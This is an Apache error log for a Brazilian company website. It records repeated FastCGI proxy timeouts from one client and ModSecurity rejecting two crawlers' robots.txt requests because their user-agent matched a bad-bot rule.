[Sun Mar 15 08:40:43.124505 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:41:04.057903 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39302] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:41:26.077940 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:41:48.185879 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:42:06.821570 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:39308] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ababDdSswJuvopo3lOjH2QAAAII"]
[Sun Mar 15 08:42:09.057857 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40068] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:42:30.120221 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40302] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:42:51.037947 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:43:12.125811 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:43:33.118120 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:43:47.382473 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.228.16:59308] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ababc9SswJuvopo3lOjIIgAAAJY"]
[Sun Mar 15 08:43:54.033852 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41386] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:44:15.125773 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:44:39.125779 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:45:00.129889 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:45:21.118330 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:45:44.101825 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:46:05.121790 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:46:26.125788 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:46:48.133668 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43538] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:47:09.125812 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:47:21.773404 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.244.31:40554] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abacSXjZBu2q05ozVU-4LwAAAUQ"]
[Sun Mar 15 08:47:30.061893 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44008] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:47:51.069887 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:48:12.083113 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:48:34.121380 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:48:54.999788 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.228.16:53864] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abacprABkC4fWIHEf8FOWQAAAEk"]
[Sun Mar 15 08:48:55.128651 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:49:16.133782 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45244] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:49:37.085825 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:49:59.121067 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:50:20.134769 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:50:41.121851 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:51:02.133842 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46504] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:51:23.141811 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46742] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:51:45.025810 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46998] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:52:07.132903 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:47314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:52:22.913770 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.244.31:50250] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaddpqj1wV0Si-Okec-ZAAAAAE"]
[Sun Mar 15 08:52:28.047444 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47580] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:52:49.125821 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:53:10.084499 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:53:36.141946 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:53:57.113833 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:54:18.126307 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48816] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:54:39.128268 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49084] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:55:01.129734 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49352] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:55:22.113860 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:55:43.116024 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:56:04.121848 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:56:26.126998 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50640] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:56:47.134791 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50982] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:57:09.121824 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:57:34.361817 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51594] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:57:56.066265 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51966] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:58:17.157873 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52282] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:58:38.133829 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:58:59.085820 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52862] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:59:20.125792 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53154] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:59:41.131751 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:00:02.158189 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:00:23.138611 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54028] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:00:44.057814 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:01:06.057876 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:01:28.132446 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:01:49.125782 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:02:11.120166 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:02:32.123799 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55710] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:02:54.137806 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:03:15.118336 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56220] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:03:36.133873 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:03:58.120259 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56702] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:04:19.121828 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:04:40.129804 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57268] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:04:44.651578 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.228.16:45134] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abagXHbQATo66fKoS7yrfwAAAMo"]
[Sun Mar 15 09:05:01.133781 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57550] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:05:24.127058 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:05:46.125814 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58100] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:06:07.033923 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:06:28.094216 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:06:50.133790 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:07:11.125815 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59214] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:07:33.065884 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:07:54.101930 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:08:14.562985 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.244.31:34374] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abahLnbQATo66fKoS7ysAwAAAMU"]
[Sun Mar 15 09:08:15.125878 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:08:36.129862 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:08:57.031539 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:09:19.125232 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:09:40.121793 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:09:46.440286 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.228.16:47190] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abahinjZBu2q05ozVU-7ZwAAAUc"]
[Sun Mar 15 09:10:01.129816 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32894] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:10:26.125760 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33252] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:10:47.041816 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:11:08.177836 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:11:29.137761 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34114] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:11:50.129809 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:12:12.137933 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:12:33.041886 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34918] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:12:55.061819 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:13:16.121871 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:13:17.760857 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.244.31:44678] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaiXdSswJuvopo3lOjMvAAAAI4"]
[Sun Mar 15 09:13:37.129795 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35606] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:13:58.133793 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:14:19.125950 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:14:40.620256 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36338] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:15:02.173815 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36568] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:15:13.049262 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.228.16:53196] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abai0XbQATo66fKoS7ytOgAAAMA"]
[Sun Mar 15 09:15:23.097846 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:15:44.047573 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:16:05.133800 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37452] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:16:26.124020 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37798] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:16:47.137784 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:17:09.381980 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:17:31.097909 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:17:52.809932 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:18:15.060170 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39508] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:18:36.165782 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39798] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:18:43.939542 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.244.31:55128] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abajo7ABkC4fWIHEf8FTQQAAAFI"]
[Sun Mar 15 09:18:57.063701 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:19:18.045809 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:19:40.129796 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:20:01.033872 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41114] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:20:20.110398 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.228.16:48620] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abakBHbQATo66fKoS7yt8QAAAMQ"]
[Sun Mar 15 09:20:22.134874 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:20:43.053843 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:21:04.129781 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:21:26.125831 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42142] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:21:47.070147 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42428] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:22:08.093879 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:22:30.095950 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:22:51.131146 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:23:12.138664 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:23:34.109837 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43680] AH01075: Error dispatching request to : (polling)
